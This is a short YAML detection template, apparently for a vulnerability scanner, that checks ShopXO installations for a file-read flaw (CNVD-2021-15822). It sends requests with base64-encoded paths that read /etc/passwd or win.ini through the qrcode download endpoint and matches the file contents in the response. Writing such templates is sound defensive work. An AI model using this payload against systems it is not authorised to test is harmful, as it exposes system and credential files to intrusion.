id: CNVD-2021-15822

info:
    name: ShopXO File Read
    author: Print1n(http://print1n.top)
    severity: high
    reference:
        - https://mp.weixin.qq.com/s/69cDWCDoVXRhehqaHPgYog

rules:
    Linux0:
        request:
            method: GET
            path: /public/index.php?s=/index/qrcode/download/url/L2V0Yy9wYXNzd2Q=
        expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
    Windows0:
        request:
            method: GET
            path: /public/index.php?s=/index/qrcode/download/url/L1dpbmRvd3Mvd2luLmluaQ=
        expression: response.status == 200 && response.body.bcontains(b"extensions") && response.body.bcontains(b"for 16-bit app support")
expression: Linux0() || Windows0()

